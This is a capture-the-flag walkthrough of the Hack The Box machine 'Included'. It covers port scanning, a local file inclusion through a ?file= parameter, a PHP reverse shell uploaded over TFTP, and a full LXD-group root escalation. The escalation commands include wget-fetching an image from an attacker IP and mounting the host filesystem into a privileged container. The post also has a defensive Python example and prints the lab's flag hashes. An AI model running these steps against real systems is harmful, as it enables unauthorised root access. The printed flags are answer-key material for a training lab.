HTB Walkthrough - Included
By Tony Harkness
- 3 minutes read - 447 words
Information Gathering
Scanned all TCP ports:
# save target IP as local variable
export ip='10.129.95.185'
# initial scan
rustscan -a $ip -- -sVC --open -oN initial
# scan results
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.95.185/?file=home.php
# udp scan results: revealed 69/udp tftp was open
Steps 2 Pwn
Discovered a website on port 80 that looked vulnerable to LFI because of the ?file= parameter in the URL address bar. Was able to dump /etc/passwd, confirming this. Among the dumped users, a tftp user was found. Thus, crafted a PHP reverse shell, uploaded it via the tftp client and got initial access as the user www-data.
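As an added example (not code from the original post or from the box's application), here is the include pattern that makes a ?file= parameter exploitable next to a hardened resolver and a simple request-log check; the web root, its contents and the allowlist are constructed assumptions:

```python
import os
import tempfile

# Constructed stand-in for the target's /var/www/html (assumption, not the box's real root).
WEBROOT = tempfile.mkdtemp(prefix="included-demo-")
# Hypothetical allowlist of pages the application is meant to include.
ALLOWED_PAGES = {"home.php", "about.php"}

with open(os.path.join(WEBROOT, "home.php"), "w") as fh:
    fh.write("<h1>home</h1>\n")


def vulnerable_resolve(file_param: str) -> str:
    """Pattern behind an exploitable ?file=: the parameter is joined to the
    web root unchecked. An absolute value replaces the root entirely and
    '..' segments walk out of it, which is how /etc/passwd becomes readable."""
    return os.path.join(WEBROOT, file_param)


def hardened_resolve(file_param: str):
    """Accept only a bare filename from the allowlist, then confirm the
    canonical path still sits directly under the web root before returning it."""
    name = os.path.basename(file_param)
    if name != file_param or name not in ALLOWED_PAGES:
        return None  # contained a path separator, or not an includable page
    root = os.path.realpath(WEBROOT)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(candidate) != root or not os.path.isfile(candidate):
        return None  # a symlink escaped the root, or the page does not exist
    return candidate


def is_lfi_attempt(file_param: str) -> bool:
    """Detection-side counterpart for a ?file= value pulled from the access log:
    flag absolute paths, traversal segments and embedded null bytes."""
    return (
        file_param.startswith("/")
        or ".." in file_param.split("/")
        or "\x00" in file_param
    )
```

A WAF or log-review rule built on is_lfi_attempt would have caught the /etc/passwd read this box allows, and hardened_resolve shows the change that removes the bug at the source.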
Upon initial access, looked in the /var/www/html/ directory for hidden files and found .htpasswd, which contained user mike's creds. Changed to mike and retrieved the user flag. The user was part of the lxd group. Upon researching, this can be abused to gain root privileges. Followed this resource from HackTricks for privesc:
# victim
# list containers
lxc ls
## victim has no internet access, thus, have to transfer image from attacker to victim
# attacker
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder/
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
python -m http.server
# victim. NOTE: You will change the IP to the IP of your attacker machine
wget http://10.10.14.167:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
# victim
# making sure in HOME folder
# importing image
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
# initializing lxd, making everything default that was allowed. conflicting options were labeled privesc
lxd init
# initializing container and giving necessary privs
lxc init myimage mycontainer -c security.privileged=true
# mount host / (including /root) into the container at /mnt/root
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# start container
lxc start mycontainer
# get shell in container
lxc exec mycontainer /bin/sh
# now, you should be root in container or at least have access to /root folder in /mnt/root/
Resolution summary
- Initial enumeration (Rustscan FTW)
- Website on port 80 vulnerable to LFI (discovered via URL address bar)
- Dumped /etc/passwd with LFI and unveiled the tftp user (likely indicating TFTP being used, confirmed with UDP scan)
- Given the web technologies discovered, crafted a PHP reverse shell, uploaded it via the tftp CLI and executed it
- With initial access as www-data, looked in /var/www/html/ for .htaccess/.htpasswd info and found user creds
- Found user was a part of the lxd group
- With the new user, followed the HackTricks section on abusing the lxd/lxc group for privesc and got root!
Improved skills
- LXD/LXC group permission abuse for privesc
Used tools
- rustscan
- tftp
- GTFObins
- HackTricks
Trophy
User.txt
a56ef91d70cfbf2cdb8f454c006935a1
Root.txt
c693d9c7499d9f572ee375d4c14c7bcf